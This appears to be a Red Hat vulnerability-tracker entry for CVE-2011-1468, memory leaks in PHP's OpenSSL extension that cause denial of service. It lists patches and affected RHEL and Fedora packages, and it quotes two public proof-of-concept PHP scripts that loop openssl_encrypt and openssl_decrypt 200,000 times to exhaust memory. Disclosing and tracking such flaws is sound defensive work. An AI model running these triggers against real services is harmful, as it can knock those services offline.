Common Vulnerabilities and Exposures assigned an identifier CVE-2011-1468 to the following vulnerability: Multiple memory leaks in the OpenSSL extension in PHP before 5.3.6 might allow remote attackers to cause a denial of service (memory consumption) via (1) plaintext data to the openssl_encrypt function or (2) ciphertext data to the openssl_decrypt function. References: [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1468 [2] http://bugs.php.net/bug.php?id=54060 [3] http://bugs.php.net/bug.php?id=54061 [4] http://www.php.net/ChangeLog-5.php Upstream patch: [6] http://svn.php.net/viewvc/?view=revision&revision=308531
Public PoC from [2]: ==================== <?php $data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls"; $pass = "r23498rui324hjbnkj"; $maxi = 200000; $t = microtime(1); for ($i=0;$i<$maxi; $i++){ openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2'); } $t = microtime(1)-$t; print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n"; ?> Public PoC from [3]: ==================== <?php $data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls"; $pass = "r23498rui324hjbnkj"; $maxi = 200000; $t = microtime(1); for ($i=0;$i<$maxi; $i++){ $cr = openssl_encrypt($data.$i, 'des3', $pass, false, '1qazxsw2'); $dcr = openssl_decrypt($cr, 'des3', $pass, false, '1qazxsw2'); if ($dcr != $data.$i){ print "at step $i decryption failed\n"; } } $t = microtime(1)-$t; print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n"; ?>
This issue did NOT affect the versions of the php package, as shipped with Red Hat Enterprise Linux 4 and 5. -- This issue affects the version of the php53 package, as shipped with Red Hat Enterprise Linux 5. This issue affects the version of the php package, as shipped with Red Hat Enterprise Linux 6. -- This issue does NOT affect the versions of the php package, as shipped with Fedora release of 13 and 14 (particular packages update has been already scheduled).
The corresponding fix to openssl_decrypt() is: http://svn.php.net/viewvc?view=revision&revision=308534
This issue has been addressed in following products: Red Hat Enterprise Linux 5 Red Hat Enterprise Linux 6 Via RHSA-2011:1423 https://rhn.redhat.com/errata/RHSA-2011-1423.html
Statement: Not vulnerable. This issue did not affect the versions of php as shipped with Red Hat Enterprise Linux 4 and 5. It has been addressed in Red Hat Enterprise Linux 5 (php53) and 6 (php).